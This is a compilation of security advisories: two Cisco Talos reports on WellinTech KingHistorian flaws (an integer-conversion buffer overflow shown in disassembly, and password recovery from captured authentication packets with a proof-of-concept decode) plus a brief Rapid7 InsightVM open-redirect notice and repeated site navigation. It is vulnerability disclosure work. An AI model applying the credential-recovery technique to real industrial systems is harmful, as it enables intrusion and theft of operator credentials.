**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WellinTech KingHistorian 35.01.00.05

**PRODUCT URLS**

KingHistorian - https://www.wellintech.com/product/kinghistorian

**CVSSv3 SCORE**

8.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-195 - Signed to Unsigned Conversion Error

**DETAILS**

KingHistorian is a time-series database used for ingesting and analyzing industrial control system data. KingHistorian is designed to be high performance and highly reliable for process data.

Within the RecvPacket functionality of SORBAx64.dll, an integer conversion issue exists that can lead to a buffer overflow. The assembly related to the conversion issue can be seen below.

    18002e81c  // 0x18002cd50 - SORBA::TcpTransceiver::Recv
    18002e81c  ff5028             call    qword [rax+0x28]
    18002e81f  85c0               test    eax, eax
    18002e821  // Check if recv successfully retrieved data
    18002e821  0f8566010000       jne     0x18002e98d
    18002e827  // Get the first byte of data
    18002e827  440fb69c24409000…movzx   r11d, byte [rsp+0x9040 {stack_recvBuffer}]
    18002e830  // sign extend the packet data size after the header (reported in header)
    18002e830  4863c7             movsxd  rax, edi
    18002e833  ba01000000         mov     edx, 0x1
    18002e838  48014328           add     qword [rbx+0x28 {SORBA::TransceiverInputStream::m_nRecvLength}], rax {SORBA::TransceiverInputStream::m_nRecvLength}
    18002e83c  410fb6c3           movzx   eax, r11b
    18002e840  41b904000000       mov     r9d, 0x4
    18002e846  2402               and     al, 0x2
    18002e848  3c02               cmp     al, 0x2                                                   [1]
    18002e84a  // First byte of recv buffer has 2 bit set
    18002e84a  410f44d1           cmove   edx, r9d  {0x4}                                           [2]
    18002e84e  8d42ff             lea     eax, [rdx-0x1]
    18002e851  83f803             cmp     eax, 0x3
    18002e854  770a               ja      0x18002e860
    18002e856  // offset into packet to find length
    18002e856  448b841441900000   mov     r8d, dword [rsp+rdx+0x9041 {var_fa17}]
    18002e85e  eb03               jmp     0x18002e863
    18002e863  418bc9             mov     ecx, r9d  {0x4}
    18002e866  bfffffffff         mov     edi, 0xffffffff
    18002e86b  2bca               sub     ecx, edx  // rcx = 0
    18002e86d  8bef               mov     ebp, edi  {0xffffffff}
    18002e86f  c1e103             shl     ecx, 0x3  // rcx = 0
    18002e872  d3ed               shr     ebp, cl  // rbp = 0xFFFF_FFFF
    18002e874  // rbp = packet_data & 0xFFFFFFFF (so no change to packet data)
    18002e874  4123e8             and     ebp, r8d
    18002e877  81fdecf90000       cmp     ebp, 0xf9ec                                               [3]
    18002e87d  // signed comparison of extracted length
    18002e87d  // This is an issue because this guard is here to protect lengths too large to 
    18002e87d  // fit in the buffer
    18002e87d  0f8f14ffffff       jg      0x18002e797
    ...
    18002e8b3  442bca             sub     r9d, edx                                                  [4]
    18002e8b6  418bc4             mov     eax, r12d
    18002e8b9  418bc9             mov     ecx, r9d
    18002e8bc  c1e103             shl     ecx, 0x3
    18002e8bf  48d3ef             shr     rdi, cl
    18002e8c2  4823f8             and     rdi, rax
    18002e8c5  41f6c301           test    r11b, 0x1                                                 [5]
    18002e8c9  7422               je      0x18002e8ed
    ...
    18002e8ed  8d441201           lea     eax, [rdx+rdx+0x1]
    18002e8f1  4c8bc7             mov     r8, rdi
    18002e8f4  4863c8             movsxd  rcx, eax
    18002e8f7  488d940c40900000   lea     rdx, [rsp+rcx+0x9040] {var_18a58}
    18002e8ff  498bca             mov     rcx, r10
    18002e902  e82f150000         call    memcpy                                                    [6]
    

At [1] a flag is extracted from the received packet that is used to determine how large the size field is later in the packet: if the second bit is set in the first byte, then the size field is 4 bytes, which is seen at [2]. Using this size field, some shifting is done to properly extract the size field from the packet for all possible values (only 1 or 4 in this code base). The main issue occurs at [3], where the size is extracted by AND’ing the packet data with 0xFFFFFFFF. If the packet data contains a value greater than 0x80000000, then the signed comparison will pass. It is then used to determine if the allocated stack buffer is large enough to hold all the data. The buffer is statically sized at 0xfa00 bytes. At [4] and [5] the same feature extraction is used to grab the size field again, but at [5] a different flag is checked, this one corresponding to if the payload is compressed or not. Regardless of if the packet is compressed, a multitude of bugs will occur. One such instance is at [6], where the extracted value is used directly as the size of memcpy, which can result in a buffer overflow.

**TIMELINE**

2022-12-16 - Initial Vendor Contact  
2022-12-22 - Vendor Disclosure  
2022-12-22 - Initial Vendor Contact  
2023-03-17 - Vendor Patch Release  
2023-03-20 - Public Release

Discovered by Carl Hurd of Cisco Talos.

CVE-2022-43663: TALOS-2022-1674 || Cisco Talos Intelligence Group

An information disclosure vulnerability exists in the User authentication functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a disclosure of sensitive information. An attacker can sniff network traffic to leverage this vulnerability.

**SUMMARY**

An information disclosure vulnerability exists in the User authentication functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a disclosure of sensitive information. An attacker can sniff network traffic to leverage this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WellinTech KingHistorian 35.01.00.05

**PRODUCT URLS**

KingHistorian - https://www.wellintech.com/product/kinghistorian

**CVSSv3 SCORE**

7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**CWE**

CWE-200 - Information Exposure

**DETAILS**

KingHistorian is a time-series database used for ingesting and analyzing industrial control system data. KingHistorian is designed to be high performance and highly reliable for process data.

The protocol used to communicate with XDBServer uses a mixture of ciphering and compression, which prevents plaintext strings from being sent directly. However, if an attacker captured an authentication packet, all the necessary information is included in the packet to recover the username and password.

Packets contain a 0x14-byte header starting with ‘SORB’ in ASCII as magic bytes. The rest of this header is uninteresting for this attack. Once the 0x14 bytes are skipped over, the packet’s first byte of data contains a flag to display if it is compressed, with the least-significant bit of the first byte representing the compression flag. If the packet is compressed, it is decompressed with quicklz . Once decompressed, the data can be recovered using length and value encoding to recover a structure as follows:

    pub struct BrkConnectionOption {
        username: String,
        ciphered_password: String,
        application_name: String,
        client_name: String,
        callback_proxy: String,
        collector_name: String,
        network_timeout: i32,
        connection_flags: i32,
        reserved_1: i32,
        reserved_2: i32,
        session_id: String,
        reserved_4: String,
        enc_key_1: i32,
        enc_key_2: i32,
        enc_key_3: i32,
        enc_key_4: i32,
        os_version: String,
        protocol_version: i32,
        system_general_1: i32,
        system_general_2: i32,
        system_general_3: i32,
        system_general_4: i32, 
    }
    

By combining the parts of the enc_key, it is possible to decipher the ciphered_password from the packet back into the plaintext form.

**Exploit Proof of Concept**

    Raw packet data : [83, 79, 82, 66, 2, 1, 70, 1, 19, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 82, 0, 0, 0, 0, 0, 71, 247, 1, 0, 0, 92, 2, 0, 0, 0, 0, 0, 128, 0, 86, 0, 0, 0, 8, 75, 0, 82, 0, 84, 0, 68, 0, 66, 0, 65, 0, 80, 0, 73, 0, 16, 66, 0, 114, 0, 107, 0, 83, 0, 10, 8, 130, 128, 101, 113, 32, 118, 99, 80, 67, 0, 111, 0, 110, 0, 110, 97, 80, 99, 0, 116, 0, 7, 226, 99, 119, 0, 85, 0, 115, 97, 80, 114, 0, 80, 50, 0, 55, 0, 4, 64, 85, 145, 53, 0, 34, 52, 48, 0, 48, 0, 57, 0, 54, 0, 49, 0, 56, 65, 32, 51, 49, 144, 49, 65, 16, 69, 49, 128, 67, 49, 96, 65, 49, 96, 51, 0, 67, 49, 128, 68, 0, 130, 85, 181, 210, 51, 65, 32, 54, 0, 52, 0, 70, 65, 48, 50, 60, 70, 65, 32, 57, 65, 48, 65, 49, 16, 57, 49, 112, 57, 49, 0, 56, 49, 48, 82, 60, 55, 49, 96, 68, 65, 96, 51, 0, 82, 60, 51, 51, 0, 106, 85, 75, 197, 48, 65, 96, 50, 65, 80, 54, 65, 16, 130, 65, 68, 65, 16, 66, 65, 64, 67, 49, 0, 49, 49, 96, 52, 49, 80, 34, 64, 55, 65, 64, 15, 75, 65, 64, 66, 81, 48, 121, 113, 48, 77, 0, 103, 113, 64, 130, 84, 69, 145, 83, 113, 64, 117, 0, 100, 0, 105, 97, 240, 11, 77, 81, 48, 69, 65, 64, 71, 65, 80, 87, 65, 144, 78, 49, 16, 48, 0, 78, 184, 86, 67, 65, 32, 75, 0, 45, 49, 64, 98, 0, 170, 90, 85, 145, 102, 49, 96, 53, 49, 96, 98, 49, 16, 45, 49, 80, 48, 97, 64, 97, 35, 208, 50, 58, 51, 33, 208, 97, 49, 64, 49, 49, 32, 45, 97, 64, 98, 49, 144, 54, 49, 32, 97, 0, 97, 49, 112, 54, 0, 40, 168, 168, 234, 99, 0, 98, 49, 128, 58, 113, 64, 99, 0, 112, 0, 32, 33, 208, 104, 33, 0, 49, 49, 144, 50, 0, 46, 49, 16, 54, 49, 128, 46, 49, 0, 46, 49, 112, 49, 33, 0, 45, 115, 0, 82, 53, 214, 6, 0, 160, 55, 49, 144, 2, 47, 116, 33, 0, 48, 1, 0, 1, 0, 2, 1, 0, 8, 0, 46, 1, 79, 64, 6, 0, 58, 92, 90, 127, 4, 12, 117, 19, 28, 39, 51, 77, 97, 144, 99, 69, 20, 85, 237, 113, 32, 111, 113, 48, 111, 0, 102, 113, 64, 32, 0, 87, 97, 144, 110, 97, 64, 111, 0, 119, 113, 48, 32, 81, 80, 110, 97, 176, 110, 97, 240, 119, 97, 224, 32, 65, 80, 66, 111, 116, 97, 144, 242, 104, 160, 170, 2, 134, 44, 0, 32, 0, 40, 49, 96, 46, 49, 96, 32, 97, 32, 117, 97, 144, 108, 97, 64, 32, 49, 144, 50, 49, 0, 48, 0, 41, 0, 0, 80, 3, 8, 0, 5, 0, 0, 0, 0, 0]
    
    BrkConnectionOption {
        username: "newUser",
        ciphered_password: "27527009618B391AE8C6A63C8D3B64FCC8FB9CA1979083E876DF3E83080F2E6A8BDABDC01645BD7D",
        application_name: "KDBSysMgtStudio",
        client_name: "MSEDGEWIN10",
        callback_proxy: "KRTDBCBK-4bf656b1-50da-4393-a412-db962aa76cb8:tcp -h 192.168.0.71 -p 5679 -t 0",
        collector_name: "",
        network_timeout: 0,
        connection_flags: 2,
        reserved_1: 0,
        reserved_2: 0,
        session_id: "",
        reserved_4: "",
        enc_key_1: 1078919470,
        enc_key_2: 1547304966,
        enc_key_3: 201621338,
        enc_key_4: 656151413,
        os_version: "Microsoft Windows Unknown Edition, (6.6 build 9200)",
        protocol_version: 217088,
        system_general_1: 0,
        system_general_2: 0,
        system_general_3: 0,
        system_general_4: 0,
        encryption_key: EncryptionKey {
            enc_1: 1078919470,
            enc_2: 1547304966,
            enc_3: 201621338,
            enc_4: 656151413,
        },
    }
    
    Password is : Thisismypassword
    

**TIMELINE**

2022-12-16 - Initial Vendor Contact  
2022-12-22 - Vendor Disclosure  
2022-12-22 - Initial Vendor Contact  
2023-03-17 - Vendor Patch Release  
2023-03-20 - Public Release

Discovered by Carl Hurd of Cisco Talos.

CVE-2022-45124: TALOS-2022-1683 || Cisco Talos Intelligence Group

Rapid7 InsightVM versions 6.6.178 and lower suffers from an open redirect vulnerability, whereby an attacker has the ability to redirect the user to a site of the attacker’s choice using the ‘page’ parameter of the ‘data/console/redirect’ component of the application. This issue was resolved in the February, 2023 release of version 6.6.179.

*   Products
    
    *   Insight Platform Solutions
    *   
    *   Threat Intelligence
        
        THREAT COMMAND
        
    *   Vulnerability Management
        
        INSIGHTVM
        
    *   Dynamic Application Security Testing
        
        INSIGHTAPPSEC
        
    *   Orchestration & Automation (SOAR)
        
        INSIGHTCONNECT
        
    *   Cloud Security
        
        INSIGHTCLOUDSEC
        
    
    *   More Solutions
    *   Penetration Testing
        
        METASPLOIT
        
    *   On-Prem Vulnerability Management
        
        NEXPOSE
        
    *   Digital Forensics and Incident Response (DFIR)
        
        Velociraptor
        
    
    *   Cloud Risk Complete
        
        Cloud Security with Unlimited Vulnerability Management
        
        Explore Offer
    *   Managed Threat Complete
        
        MDR with Unlimited Risk Coverage
        
        Explore offer
    
*   Services
    
    *   MANAGED SERVICES
    *   Detection and Response
        
        24/7 MONITORING & REMEDIATION FROM MDR EXPERTS
        
    *   Vulnerability Management
        
        PERFECTLY OPTIMIZED RISK ASSESSMENT
        
    *   Application Security
        
        SCAN MANAGEMENT & VULNERABILITY VALIDATION
        
    
    *   OTHER SERVICES
    *   Security Advisory Services
        
        PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES
        
    *   Product Consulting
        
        QUICK-START & CONFIGURATION
        
    *   Training & Certification
        
        SKILLS & ADVANCEMENT
        
    *   Penetration Services
        
        TEST YOUR DEFENSES IN REAL-TIME
        
    *   IoT Security Testing
        
        SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD
        
    *   Premium Support
        
        PRIORITY HELP & FASTER SOLUTIONS
        
    
*   Support & Resources
    
    *   SUPPORT
    *   Support Portal
        
        CONTACT CUSTOMER SUPPORT
        
    *   Product Documentation
        
        EXPLORE PRODUCT GUIDES
        
    *   Release Notes
        
        DISCOVER THE LATEST PRODUCT UPDATES
        
    *   
    
    *   RESOURCES
    *   Fundamentals
        
        FOUNDATIONAL SECURITY KNOWLEDGE
        
    *   Blog
        
        THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE
        
    *   Resources Library
        
        E-BOOKS, WHITE PAPERS, VIDEOS & BRIEFS
        
    *   Extensions Library
        
        PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY
        
    *   Partners
        
        RAPID7 PARTNER ECOSYSTEM
        
    *   Webcasts & Events
        
        UPCOMING OPPORTUNITIES TO CONNECT WITH US
        
    *   Vulnerability & Exploit Database
        
        SEARCH THE LATEST SECURITY RESEARCH
        
    
*   Company
    
    *   OVERVIEW
    *   
    *   Leadership
        
        EXECUTIVE TEAM & BOARD
        
    *   News & Press Releases
        
        THE LATEST FROM OUR NEWSROOM
        
    *   
    *   Our Customers
        
        Their Success Stories
        
    
    *   COMMUNITY & CULTURE
    *   Social Good
        
        OUR COMMITMENT & APPROACH
        
    *   Rapid7 Cybersecurity Foundation
        
        BUILDING THE FUTURE
        
    *   Diversity, Equity & Inclusion
        
        EMPOWERING PEOPLE
        
    *   Open Source
        
        STRENGTHENING CYBERSECURITY
        
    *   Public Policy
        
        ENGAGEMENT & ADVOCACY
        
    
*   RESEARCH
*    Sign In

*   All Products
    
    *   AppSpider
    *   Insight Agent
    *   InsightAppSec
    *   InsightCloudSec
    *   InsightConnect
    *   Insight Platform
    *   InsightIDR
    *   Insight Network Sensor
    *   InsightOps
    *   InsightVM
    *   Metasploit
    *   Nexpose
    *   tCell
    *   Managed Services
    

*   Products
    
    *   Insight Platform Solutions
    *   
    *   Threat Intelligence
        
        THREAT COMMAND
        
    *   Vulnerability Management
        
        INSIGHTVM
        
    *   Dynamic Application Security Testing
        
        INSIGHTAPPSEC
        
    *   Orchestration & Automation (SOAR)
        
        INSIGHTCONNECT
        
    *   Cloud Security
        
        INSIGHTCLOUDSEC
        
    
    *   More Solutions
    *   Penetration Testing
        
        METASPLOIT
        
    *   On-Prem Vulnerability Management
        
        NEXPOSE
        
    *   Digital Forensics and Incident Response (DFIR)
        
        Velociraptor
        
    
    *   Cloud Risk Complete
        
        Cloud Security with Unlimited Vulnerability Management
        
        Explore Offer
    *   Managed Threat Complete
        
        MDR with Unlimited Risk Coverage
        
        Explore offer
    
*   Services
    
    *   MANAGED SERVICES
    *   Detection and Response
        
        24/7 MONITORING & REMEDIATION FROM MDR EXPERTS
        
    *   Vulnerability Management
        
        PERFECTLY OPTIMIZED RISK ASSESSMENT
        
    *   Application Security
        
        SCAN MANAGEMENT & VULNERABILITY VALIDATION
        
    
    *   OTHER SERVICES
    *   Security Advisory Services
        
        PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES
        
    *   Product Consulting
        
        QUICK-START & CONFIGURATION
        
    *   Training & Certification
        
        SKILLS & ADVANCEMENT
        
    *   Penetration Services
        
        TEST YOUR DEFENSES IN REAL-TIME
        
    *   IoT Security Testing
        
        SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD
        
    *   Premium Support
        
        PRIORITY HELP & FASTER SOLUTIONS
        
    
*   Support & Resources
    
    *   SUPPORT
    *   Support Portal
        
        CONTACT CUSTOMER SUPPORT
        
    *   Product Documentation
        
        EXPLORE PRODUCT GUIDES
        
    *   Release Notes
        
        DISCOVER THE LATEST PRODUCT UPDATES
        
    *   
    
    *   RESOURCES
    *   Fundamentals
        
        FOUNDATIONAL SECURITY KNOWLEDGE
        
    *   Blog
        
        THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE
        
    *   Resources Library
        
        E-BOOKS, WHITE PAPERS, VIDEOS & BRIEFS
        
    *   Extensions Library
        
        PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY
        
    *   Partners
        
        RAPID7 PARTNER ECOSYSTEM
        
    *   Webcasts & Events
        
        UPCOMING OPPORTUNITIES TO CONNECT WITH US
        
    *   Vulnerability & Exploit Database
        
        SEARCH THE LATEST SECURITY RESEARCH
        
    
*   Company
    
    *   OVERVIEW
    *   
    *   Leadership
        
        EXECUTIVE TEAM & BOARD
        
    *   News & Press Releases
        
        THE LATEST FROM OUR NEWSROOM
        
    *   
    *   Our Customers
        
        Their Success Stories
        
    
    *   COMMUNITY & CULTURE
    *   Social Good
        
        OUR COMMITMENT & APPROACH
        
    *   Rapid7 Cybersecurity Foundation
        
        BUILDING THE FUTURE
        
    *   Diversity, Equity & Inclusion
        
        EMPOWERING PEOPLE
        
    *   Open Source
        
        STRENGTHENING CYBERSECURITY
        
    *   Public Policy
        
        ENGAGEMENT & ADVOCACY
        
    
*   RESEARCH

*   Sign In

*   Documentation
*   All Products
    
    *   AppSpider
    *   Insight Agent
    *   InsightAppSec
    *   InsightCloudSec
    *   InsightConnect
    *   Insight Platform
    *   InsightIDR
    
    *   Insight Network Sensor
    *   InsightOps
    *   InsightVM
    *   Metasploit
    *   Nexpose
    *   tCell
    *   Managed Services

Tag

#intel